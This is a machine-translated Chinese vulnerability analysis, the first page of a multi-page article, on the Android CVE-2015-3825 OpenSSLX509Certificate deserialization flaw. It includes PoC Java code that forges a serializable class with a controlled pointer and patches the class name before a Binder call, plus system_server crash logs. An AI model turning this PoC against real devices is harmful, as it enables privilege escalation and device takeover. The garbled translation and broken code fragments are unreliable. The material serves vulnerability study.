OpenSSLX509Certificate deserialization Vulnerability, CVE-2 0 1 5-3 8 2 5)cause analysis-vulnerability warning-the black bar safety net

2015-11-10T00:00:00
ID MYHACK58:62201568820
Type myhack58
Reporter 佚名
Modified 2015-11-10T00:00:00

Description

Serialization (Serialization), is the state of the object information can be converted to storage or transmission in the form of the process. During serialization, the object will be in its current state is written to a temporary or persistent storage area. The user can pass from the storage area to read or deserialize the state of the object, re-create the object. Android also has many scenes use serialization for data transfer, such as App between/within the object is passed, the Binder communication of data transfer, etc., generally relates to a cross-process, cross-permissions. Serialization/de-serialization is also a program/interface of an input, the storage area of the content or the sequence may be random fill, if used when verification is not complete, can also cause security vulnerabilities. In the Android system, through serialization/deserialization vulnerability App denial of service, elevation of privilege and other attacks. 0x01 vulnerability causes This Android serialization Vulnerability(CVE-2 0 1 5-3 8 2 5), The impact of Android4. 3 and Android5. 1 version, which is Jelly Bean, KitKat, Lollipop and Android M preview 1, the spread to 5 5%of Android devices. Available at the affected device on the right to system permissions, it means that the attacker can replace the target app's apk to take over the victim's cell phone on any application. This vulnerability is determined by the IBM security team Or Peles and Roee Hay in USENIX 2 0 1 5 The General Assembly on the subject the ONE CLASS TO RULE THEM ALL 0-DAY DESERIALIZATION VULNERABILITIES IN ANDROID on【1】。 2.1 PoC configuration Paper author didn't release the Exploit didn't release the PoC, according to this paper we can know that the vulnerability is out in the OpenSSLX509Certificate full package name path for the com. android. org. conscrypt. OpenSSLX509Certificate class, the OpenSSLX509Certificate classes meet: 1)OpenSSLX509Certificate is serializable, because he inherited from serializable Certificate class; 2)It has a finalize()method, and calls the native method libjavascrypto. so, the parameter field mContext, long type is actually a pointer type);3)OpenSSLX509Certificate also does not implement specific anti-serialization methods readObject and readResolve; and Where mContext is to find the may be attacks to control the pointer. I the CVE-2 0 1 4-7 9 1 1 POC for a makeover, you first define a class com. android. org. conscrypt. ApenSSLX509Certificate, as follows: public class ApenSSLX509Certificate implements Serializable { //private static final long serialVersionUID = -5454153458060784251L;//android4. 4. 2 emulator private static final long serialVersionUID = -8550350185014308538L;//android 5.1.1 emulator public final long mContext; ApenSSLX509Certificate(long ctx) { mContext = ctx; } } Note that the package named com. android. org. conscrypt, the 然后 在 同 包 名下 创建 一 个 MainActivity.java for ApenSSLX509Certificate to call: com. android. org. conscrypt. ApenSSLX509Certificate evilProxy = new com. android. org. conscrypt. ApenSSLX509Certificate(0x7f7f7f7f7f7f7f7fL); b. putSerializable("eatthis", evilProxy); And CVE-2 0 1 4-7 9 1 1 PoC to the“android. os. IUserManager”the service sends a request before, modify the class name: int l = data. length; for (int i=0; i4; i++) { if (data[i] == 'A' && data[i+1] == 'p' && data[i+2] == 'e' && data[i+3] == 'n') { data[i] = 'O'; break; } } Similar to the CVE-2 0 1 4-7 9 1 1 analysis, we also on service. jar plus some of the log information output in the Android 4.4.2 AVD, installation, operation, PoC, we see: E/CVE-2 0 1 4-7 9 1 1-trace(1 6 6 9): setApplicationRestrictions E/CVE-2 0 1 4-7 9 1 1-trace(1 6 6 9): writeApplicationRestrictionsLocked E/CVE-2 0 1 4-7 9 1 1-trace(1 6 6 9): writeApplicationRestrictionsLocked::for::eatthis E/CVE-2 0 1 4-7 9 1 1-trace(1 6 6 9): writeApplicationRestrictionsLocked::for::else E/CVE-2 0 1 4-7 9 1 1-trace(1 6 6 9): writeApplicationRestrictionsLocked::Exception E/CVE-2 0 1 4-7 9 1 1-trace(1 6 6 9): writeApplicationRestrictionsLocked::Exception::java. lang. ClassCastException: com. android. org. conscrypt. OpenSSLX509Certificate cannot be cast to java. lang. String[] W/System. err(1 6 6 9): The java. lang. ClassCastException: com. android. org. conscrypt. OpenSSLX509Certificate cannot be cast to java. lang. String[] at com. android. server. pm. UserManagerService. writeApplicationRestrictionsLocked(UserManagerService. java:1 4 1 7) at com. android. server. pm. UserManagerService. setApplicationRestrictions(UserManagerService. java:1 1 2 4) at android. os. IUserManager$Stub. onTransact(IUserManager. java:2 4 5) W/System. err(1 6 6 9): at android. os. Binder. execTransact(Binder. java:4 0 4) W/System. err(1 6 6 9): at dalvik. system. NativeStart. run(Native Method) E/UserManagerService(1 6 6 9): Error writing application restrictions list It is also mandatory type conversion causes an exception, and the CVE-2 0 1 4-7 9 1 1 mandatory conversion of java. io. Serializable cause of the exception is different, because of the incoming object itself is not serialized object, resulting in a type conversion failure. CVE-2 0 1 5-3 8 2 5 is will com. android. org. conscrypt. OpenSSLX509Certificate cast to java. lang. String[]without generating an exception. Verify that the PoC process, the Android 4.4.2 AVD, you'll trigger the“Error writing application restrictions list”exception, but the GC resource recovery is not triggered. In Android 5.1.1 AVD, by repeatedly transmitted n times“TRANSACTION_setApplicationRestrictions”request can trigger GC resource recovery, and finally cause the system_server crash: A/libc(4 8 3 9): Fatal signal 1 1 (SIGSEGV), code 1, fault addr 0x7f7f7f8f in tid 4 8 4 8 (FinalizerDaemon) I/DEBUG(6 1): I/DEBUG(6 1): Build fingerprint: 'generic/sdk_phone_armv7/generic:5.1/LKY45/1 7 3 7 5 7 6:eng/test-keys' I/DEBUG(6 1): Revision: '0' I/DEBUG(6 1): ABI: 'arm' I/DEBUG(6 1): pid: 4 8 3 9, tid: 4 8 4 8, name: FinalizerDaemon >>> system_server

[1] [2] [3] [4] [5] [6] next